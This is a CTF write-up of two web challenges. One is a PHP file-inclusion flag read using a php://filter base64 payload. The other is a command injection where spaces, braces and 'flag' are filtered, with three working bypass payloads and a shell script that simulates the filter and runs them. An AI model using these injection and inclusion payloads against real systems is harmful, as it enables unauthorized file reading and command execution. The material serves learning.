1. [ACTF2020 Freshman Competition] Include
1. Topic
2. Problem solving steps
I clicked in and took a look. Going by my guess, it should be related to a PHP file-inclusion vulnerability... I tried to display phpinfo, but as expected that failed. After reading the writeup (wp) I realized that this is a pseudo-protocol problem. Then I flipped through my earlier blog post, copied the payload, and solved the problem.
?file=php://filter/convert.base64-encode/resource=flag.php
The php://filter wrapper with the convert.base64-encode filter makes the include() return the raw bytes of flag.php base64-encoded instead of executing them as PHP, so the source (and the flag inside it) shows up in the response body. Decode the base64 to read it.
3. Summary
- This is the second time I have done a pseudo-protocol problem; I can only say that I was inexperienced and did not recognize it. Next time you encounter a problem where a parameter like ?file= accesses a file, try this.
4. References
1. [GXYCTF2019]Ping Ping Ping
1. Topic
2. Problem solving steps
I was confused, so I tried passing a variable to ip. It is an RCE (command injection) vulnerability, but some keywords are filtered.
I really want to learn to write scripts and then use a script to test which characters are filtered... I know the vulnerability type here, and which functions should be tested exhaustively. Nothing was filtered... let's take a look at the writeup out of laziness...
I lost this one; the writeup author's wisdom is indeed boundless. I did not expect to just read the file directly.
(Note: ls lists the files in a directory and cat prints a file's contents; they are the standard Linux commands for finding and reading files.)
Reading the writeup, the reason is that spaces are filtered, and the writeup author bypasses that with ${IFS}. $IFS is the shell's built-in Internal Field Separator variable: it holds the characters the shell uses to split words, by default space, tab and newline, so an unquoted $IFS expands to whitespace wherever a space is needed. With the principle understood, time to try it!
No luck: the braces are filtered too, and the writeup author says to change it to $IFS$1 instead.
... I searched Baidu for a long time and did not understand why $IFS$1 is used.
The reason is how the shell parses variable names: in cat$IFSflag.php the shell reads the longest valid name, IFSflag, which is unset, so the command collapses to cat.php. ${IFS} is the usual way to terminate the name, but braces are blocked; $1 (the first positional parameter, which is empty in the shell PHP spawns) ends the name without adding any characters, so cat$IFS$1flag.php becomes cat flag.php.
I did not do this step: the writeup author suggests reading index.php to reveal the source code, where the regex shows exactly what is filtered. There are three ways to bypass it.
- Variable concatenation
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
The general idea is to define a variable a=g and then write fla$a.php, so the raw payload never contains the string flag and the regex does not match; the shell expands $a to g only after the filter has run. What needs to be noted here is the form of the regex in index.php: it checks whether the four letters f, l, a, g appear anywhere in the string in that order, so the letter replaced by the variable must break that sequence. The variable also has to sit at the end of the word: $a followed directly by more letters (for example $ag) would be read as a different variable name, and braces cannot be used to delimit it.
- sh bypass
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
sh and bash are both Linux shells with compatible syntax for this purpose (bash is a superset of sh). index.php filters the string bash but not sh. Encode the command cat flag.php as base64 (Y2F0IGZsYWcucGhw), so neither the space nor the word flag appears in the raw payload; base64 -d decodes it back and pipes it into sh, which executes it.
- Command substitution (inline execution)
?ip=127.0.0.1;cat$IFS$1`ls`
The shell executes the command inside the backticks first and substitutes its output into the command line, so this becomes cat followed by every file ls lists, here cat flag.php index.php (ls sorts its output alphabetically). Both files are displayed, and the word flag never appears in the payload.
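The three bypasses above, run against a local simulation, as an added example that is not code from the original writeup or the challenge. The real index.php is not reproduced on the page, so the filter in blocked() is an assumption that follows the description: reject a space, a brace, the word bash, and any input in which the letters f, l, a, g occur in that order. The file contents and directory are constructed for the demo; words_of() shows why the $1 terminator is needed, and run_payload() hands the string to sh the way the vulnerable ping call does.

```sh
#!/bin/sh
# Added example, not from the original writeup. Simulates the Ping Ping Ping
# filter as described in the text (an assumption, not the real index.php) and
# shows what the shell turns each bypass payload into.

# Scratch "web root" with constructed file contents (not the real challenge files).
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
FLAG_SRC='<?php $flag = "flag{demo}"; ?>'
INDEX_SRC='<?php /* demo index.php */ ?>'
printf '%s\n' "$FLAG_SRC" > "$WORK/flag.php"
printf '%s\n' "$INDEX_SRC" > "$WORK/index.php"

# blocked PAYLOAD: exit status 0 when the approximated filter would reject it.
# The filter sees the raw query string, before any shell expansion happens.
blocked() {
    case "$1" in
        *' '* | *'{'* | *'}'* | *bash*) return 0 ;;   # space, braces, "bash"
        *f*l*a*g*)                      return 0 ;;   # the f.*l.*a.*g regex
    esac
    return 1
}

# words_of WORD: the argument list the shell builds from one unquoted word,
# with no positional parameters set (so $1 is empty, as in PHP's shell).
# cat$IFSflag.php -> "cat.php"  (IFSflag is read as one variable name)
# cat$IFS$1flag.php -> "cat" "flag.php"  ($1 terminates the name IFS)
words_of() {
    w=$1
    ( set --; eval "set -- $w"; printf '%s|' "$@" )
}

# run_payload PAYLOAD: what the vulnerable shell_exec("ping -c 1 " . $ip) does.
# The string reaches sh unquoted, so ';', '|', backticks and variables are all
# interpreted. Runs inside $WORK with ping stubbed out and no positional
# parameters; returns whatever the injected commands print.
run_payload() {
    payload=$1
    (
        cd "$WORK" || exit 1
        ping() { :; }
        set --
        eval "ping -c 1 $payload" 2>/dev/null
    )
}

# Demo: the naive payload is blocked, the three bypasses are not.
for p in 'cat flag.php' \
         '127.0.0.1;a=g;cat$IFS$1fla$a.php' \
         '127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh' \
         '127.0.0.1;cat$IFS$1`ls`'; do
    if blocked "$p"; then
        echo "BLOCKED: $p"
    else
        echo "PASSED:  $p"
        run_payload "$p"
    fi
done
```

The loop at the end is only a demonstration; blocked and run_payload can be called directly with any candidate payload to check it against the described filter before sending it to the real target.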
3. Summary
- This is the third RCE question; I feel that the core is bypassing. This question taught me how to bypass the space filter and three ways to get the string past it.
- Familiarize yourself with Linux commands like ls, cat and bash, and with the concept of sh and so on.
- The regex rules are really arcane... I thought about variable splicing for a long time. Why can only the last letter be substituted? This matching rule is really interesting...
4. References
- Learning a shell variable: $IFS - Happy Carnival - Blog Park
- [GXYCTF2019]Ping Ping Ping - Wang Tanzhi - Blog Park
- [GXYCTF2019]Ping Ping Ping (RCE) - xlcvv's blog - CSDN blog
- The difference between sh and bash in the Linux shell
- Summary of command execution vulnerabilities and bypasses - ghtwf01 - ghtwf01's blog